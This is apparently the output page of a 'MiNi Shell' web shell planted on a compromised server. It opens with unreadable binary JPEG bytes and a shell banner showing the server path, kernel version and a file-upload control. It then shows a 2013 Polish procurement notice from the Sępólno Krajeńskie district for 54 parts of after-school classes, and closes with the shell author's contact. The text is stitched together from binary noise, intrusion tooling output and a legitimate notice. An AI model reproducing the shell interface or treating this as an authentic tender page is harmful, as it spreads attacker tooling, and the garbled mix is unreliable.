JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131007/206965-N-2013.html

<p class="kh_header"><b>Sępólno Krajeńskie: Realizacja dodatkowych zajęć pozalekcyjnych dla młodzieży w ramach projektu Mój start w życie zawodowe III</b><br>
<b>Numer ogłoszenia: 206965 - 2013; data zamieszczenia: 07.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Sępólnie Krajeńskim , ul. Kościuszki 11, 89-400 Sępólno Krajeńskie, woj. kujawsko-pomorskie, tel. 052 3881300, faks 052 3881303.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja dodatkowych zajęć pozalekcyjnych dla młodzieży w ramach projektu Mój start w życie zawodowe III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na realizacji dodatkowych zajęć pozalekcyjnych dla młodzieży w ramach projektu Mój start w życie zawodowe III realizowanych w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach  Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.
Zajęcia będą odbywać się na terenie szkół wymienionych w pkt.6.1; 6.2; 6.3, zgodnie z harmonogramem ustalonym przez Zamawiającego, w oparciu o opracowane przez Wykonawcę programy zajęć uwzględniające wymagania określone w SIWZ.
Dodatkowe zajęcia pozalekcyjne dla młodzieży obejmują:
3.1.Zajęcia maturalne i zajęcia przygotowujące do egzaminu zawodowego. Celem zajęć jest lepsze przygotowanie uczniów do egzaminów zewnętrznych w 2014 r.  Zajęcia prowadzone będą w okresie X 2013 VI 2014 r. w systemie 1x2h tygodniowo,  łącznie 30h na grupę, w grupach 8 osobowych. Metodyka: wykład i warsztat.
3.2.Zajęcia rozwijające z przedmiotów matematyczno przyrodniczych, ICT, przedmiotów zawodowych i sportowo rekreacyjne. Celem zajęć jest rozwój kompetencji kluczowych, nauka poszukiwania informacji i wyciągania z nich wniosków, a zatem m.in. umiejętności samodzielnej pracy. Zajęcia prowadzone będą w okresie X.2013 r.  VI 2014 r. w systemie 1x2h tygodniowo, łącznie 60h na grupę, w grupach 8 osobowych.
3.3.Zajęcia wyrównujące z różnych przedmiotów. Celem zajęć jest wyrównanie poziomu wiedzy  w zakresie danego przedmiotu pomiędzy uczestnikami zajęć a ich rówieśnikami, co pozwoli na powrót do pełnego uczestnictwa w realizacji programu nauczania. Zajęcia prowadzone będą w okresie X.2013 r.  VI 2014 r. w systemie 1x2h tygodniowo, łącznie 60h na grupę, w grupach 5 osobowych. 
3.4.Zajęcia wsparcia psychologicznego: nauka techniki opanowania stresu szkolnego i radzenia sobie ze szkolnymi niepowodzeniami. Udział w warsztatach ma pozwolić uczniom na pełniejsze wykorzystanie możliwości, jakie niesie im uczestnictwo w projekcie, a także zachęci ich do bardziej aktywnej postawy w szkole. Zajęcia prowadzone będą w okresie X.2013 r.  XII 2014 r. łącznie 15h na grupę, w  grupach 8 osobowych.
3.5.Zajęcia indywidualnego doradztwa zawodowego w wymiarze 4h na osobę. Podczas indywidualnych spotkań z doradcą wypracowane zostaną scenariusze edukacyjno- zawodowe przekazane uczniom na zakończenie zajęć, dla osiągnięcia zakładanych celów edukacyjnych, a w przyszłości także zawodowych.
3.6.Zajęcia warsztatowe o charakterze rozwijającym realizowane  w salach szkolnych. Zajęcia prowadzone będą w okresie X.2013 r.  VI 2014 r. w systemie 1x2h tygodniowo- łącznie 60h na grupę, w grupach 5 osobowych, w przypadku pracy z uczniami upośledzonymi w grupie 3 osobowej. Metodyka warsztat.
 Zajęcia powinny odbywać się, godz. dydaktyczna trwa 45 min., od poniedziałku do piątku po zajęciach lekcyjnych. Pomiędzy każdą godziną lekcyjną należy uwzględnić przerwę trwającą ok. 5 min. Czas przerwy nie jest wliczany do czasu zajęć. Zajęcia mogą być realizowane w trybie weekendowym, soboty  niedziele, w porozumieniu z Zamawiającym i Dyrektorem szkoły. Materiały biurowe do realizacji zajęć zabezpiecza Zamawiający. Zamawiający zastrzega sobie prawo do hospitacji i oceny jakości prowadzonych zajęć przez Wykonawcę. Hospitacji będzie dokonywała osoba posiadająca odpowiednie kwalifikacje i wyznaczona przez Zamawiającego.
Wykonawca zobowiązany jest w szczególności do:
przeprowadzenia zajęć dla uczniów w miejscu i terminach uzgodnionych z Zamawiającym,
dołożenia wszelkich starań, ażeby zajęcia prowadzone były na najwyższym poziomie, stwarzając tym samym uczestnikom optymalne warunki do nauki. Wykonawca powinien również motywować uczestników do nauki tak aby zapewnić pełną frekwencję  na zajęciach, 
bieżącego sprawdzania listy uczestników obecnych na zajęciach. Uczestnicy zobowiązani są do dokumentowania swojej obecności podpisem. Listy obecności Wykonawca przekazuje w wyznaczonych terminach Zamawiającemu,
dopilnowania, aby podczas każdych zajęć sala lekcyjna zaopatrzona była w odpowiedni plakat informujący, że szkolenie finansowane jest ze środków Europejskiego Funduszu Społecznego, w ramach POKL. Plakat informacyjny dostarcza Zamawiający,
prowadzenia Dziennika zajęć określającego tematykę prowadzonych zajęć na podstawie opracowanego przez Wykonawcę programu zajęć. Dziennik dostarcza Zamawiający. Po zakończeniu całego cyklu zajęć, w ciągu 5 dni roboczych Wykonawca musi przekazać Zamawiającemu uzupełniony dziennik zajęć, listy obecności itp.
przestrzegania punktualnego rozpoczynania i kończenia zajęć. Niezwłocznego informowania Zamawiającego o każdym spóźnieniu. W przypadku spóźnienia, do odpracowania czasu w terminie uzgodnionym z grupą i Zamawiającym,
uczestnictwa w kontrolach przeprowadzonych przez uprawnione podmioty, udostępniania dokumentacji i udzielania niezbędnych informacji,
przeprowadzenia na zlecenie Zamawiającego ankiet wstępnych i ewaluacyjnych oraz przekazanie ich Zamawiającemu. Druki ankiet dostarczy Zamawiający.
przygotowania i przeprowadzenia testowych pomiarów, przyrostu wiedzy, dwukrotnie (na początku i końcu zajęć), a w przypadku zajęć opisanych w pkt. 3.2- trzykrotnie (na początku, półmetku i końcu zajęć),  wśród uczestników oraz dokonania analizy wyników tych testów i przekazanie ich Zamawiającemu.
Przedmiot zamówienia podzielony został na 54 odrębnych zadań, różniących się miejscem przeprowadzenia zajęć oraz rodzajem zajęć z których każde stanowi odrębną część zamówienia.
6.1.Dodatkowe zajęcia pozalekcyjne dla młodzieży w Zespole Szkół Ponadgimnazjalnych, ul. Przemysłowa 15, 89-400 Sępólno Krajeńskie
6.1.1 Część I  Zajęcia maturalne z języka polskiego dla 1 grupy (30h)
6.1.2 Część II Zajęcia maturalne z matematyki dla 1 grupy (30h)
6.1.3 Część III Zajęcia przygotowujące do egzaminu zawodowego w zawodzie 
sprzedawca dla 1grupy (30h)
6.1.4 Część IV Zajęcia przygotowujące do egzaminu zawodowego w zawodzie technik mechanik dla 1 grupy (30h)
6.1.5 Część V Zajęcia przygotowujące do egzaminu zawodowego w zawodzie technik drogownictwa dla 1 grupy (30h)
6.1.6 Część VI Zajęcia rozwijające z konstrukcji maszyn dla 1 grupy (60h)
6.1.7 Część VII Zajęcia rozwijające z matematyki dla 1 grupy (60h)
6.1.8 Część VIII Zajęcia wyrównujące z języka polskiego dla 1 grupy (60h)
6.1.9 Część IX Zajęcia wyrównujące z języka niemieckiego dla 1 grupy (60h)
6.1.10 Część X Zajęcia wyrównujące z j. angielskiego dla 1 grupy (60h)
6.1.11 Część XI Zajęcia wyrównujące z j. rosyjskiego dla 1 grupy (60h)
6.1.12 Część XII Zajęcia wyrównujące z j.angielskiego dla 1 grupy (60h)
6.1.13 Część XIII Zajęcia wsparcia psychologicznego dla 1 grupy (15 h)
6.1.14 Część XIV Zajęcia indywidualnego doradztwa zawodowego dla 15 osób (60h)
6.2.Dodatkowe zajęcia pozalekcyjne dla młodzieży w Centrum Kształcenia 
Zawodowego i Ustawicznego, ul. Pocztowa 14b, 89-410 Więcbork,
6.2.1 Część XV Zajęcia maturalne z matematyki dla 1 grupy (30h)
6.2.2 Część XVI Zajęcia maturalne z języka polskiego dla 1 grupy (30h)
6.2.3 Część XVII Zajęcia maturalne z języka polskiego dla 1 grupy (30h)
6.2.4 Część XVIII Zajęcia przygotowujące do egzaminu zawodowego w zawodzie 
technik hotelarstwa dla 1 grupy (30h)
6.2.5 Część XIX Zajęcia przygotowujące do egzaminu zawodowego w zawodzie technik ekonomista dla 1 grupy (30h)
6.2.6 Część XX Zajęcia przygotowujące do egzaminu zawodowego w zawodzie technik informatyk dla 1 grupy (30h)
6.2.7 Część XXI Zajęcia rozwijające z języka niemieckiego zawodowego dla 1 grupy 
(60h)
6.2.8 Część XXII Zajęcia rozwijające z języka angielskiego zawodowego dla 1 grupy 
(60h)
6.2.9 Część XXIII Zajęcia rozwijające z języka angielskiego zawodowego dla 1 grupy 60h)
6.2.10 Część XXIV Zajęcia rozwijające sportowo-rekreacyjne dla 1 grupy (60h)
6.2.11 Część XXV Zajęcia rozwijające sportowo-rekreacyjne dla 1 grupy (60h)
6.2.12 Część XXVI Zajęcia rozwijające z geografii dla 1 grupy (60h)
6.2.13 Część XXVII Zajęcia rozwijające informatyczne - tworzenie stron WWW dla 1 grupy (60h)
6.2.14 Część XXVIII Zajęcia rozwijające w zawodzie technik ekonomista dla 1 
grupy (60h)
6.2.15 Część XXIX Zajęcia warsztatowe w pracowni szkolnej gastronomiczne dla 1 grupy (60h) 
6.2.16 Część XXX Zajęcia warsztatowe w pracowni szkolnej kelnersko-gastronomiczne dla 1 grupy (60h)
6.2.17 Część XXXI Zajęcia wyrównujące z j polskiego dla 1 grupy (60h)
6.2.18 Część XXXII Zajęcia wyrównujące z matematyki dla 1 grupy (60h)
6.2.19 Część XXXIII Zajęcia wyrównujące z matematyki dla 1 grupy (60h)
6.2.20 Część XXXIV Zajęcia wyrównujące z j angielskiego dla 1 grupy (60h)
6.2.21 Część XXXV Zajęcia wyrównujące z j. niemieckiego dla 1 grupy (60h)
6.2.22 Część XXXVI Zajęcia wsparcia psychologicznego dla 1 grupy (15 h)
6.2.23 Część XXXVII Zajęcia indywidualnego doradztwa zawodowego dla 15 osób 60h)
6.3.Dodatkowe zajęcia pozalekcyjne dla młodzieży w Zespole Szkół Centrum Kształcenia Rolniczego, ul. Kwiatowa 3, 89-422 Sypniewo,
6.3.1 Część XXXVIII  Zajęcia maturalne z matematyki dla 1 grupy (30h)
6.3.2 Część XXXIX Zajęcia maturalne z języka polskiego dla 1 grupy (30h)
6.3.3 Część XL Zajęcia przygotowujące do egzaminu zawodowego w zawodzie technik żywienia i gospodarstwa domowego dla 1 grupy (30h)
6.3.4 Część XLI Zajęcia przygotowujące do egzaminu zawodowego w zawodzie technik żywienia i gospodarstwa domowego dla 1 grupy (30h)
6.3.5 Część XLII Zajęcia rozwijające z geografii dla 1 grupy (60h)
6.3.6 Część XLIII Zajęcia rozwijające z technologii gastronomicznej dla 1 grupy (60h)
6.3.7 Część XLIV Zajęcia rozwijające z informatyki dla 1 grupy (60h)
6.3.8 Część XLV Zajęcia wyrównujące z matematyki dla 1 grupy (60h)
6.3.9 Część XLVI Zajęcia wyrównujące z matematyki dla 1 grupy (60h)
6.3.10 Część XLVII Zajęcia wyrównujące z biologii dla 1 grupy (60h)
6.3.11 Część XLVIII Zajęcia wyrównujące z j. niemieckiego dla 1 grupy (60h)
6.3.12 Część XLIX Zajęcia wyrównujące z technologii gastronomicznej dla 1 grupy 60h)
6.3.13 Część L Zajęcia wyrównujące z języka angielskiego dla 1 grupy (60h)
6.3.14 Część LI Zajęcia wsparcia psychologicznego dla 1 grupy (15h)
6.3.15 Część LII Zajęcia indywidualnego doradztwa zawodowego dla 15 osób (60h)
6.3.16 Część LIII Zajęcia warsztatowe w pracowni szkolnej kelnersko  gastronomiczne dla 1 grupy (60h)
6.3.17 Część LIV Zajęcia warsztatowe w pracowni szkolnej ze spawalnictwa
dla 1 grupy (60h).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 54.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia. 
Warunek uznaje się za spełniony, jeżeli Wykonawca posiada kwalifikacje do prowadzenia odpowiedniego rodzaju zajęć w szkole ponadgimnazjalnej zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wg załącznika nr 1) - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną. 
2. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 Ustawy. Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika - w formie oryginału lub kopii poświadczonej notarialnie. 
3. Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej) - w formie oryginału lub kopii poświadczonej notarialnie. 
4. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - w formie oryginału.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-sepolno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sępólnie Kraj. - ul. Kościuszki 11, 89-400 Sępólno Kraj..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Sępólnie Kraj. - ul. Kościuszki 11, 89-400 Sępólno Kraj..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Mój start w życie zawodowe III realizowanych w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach  Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com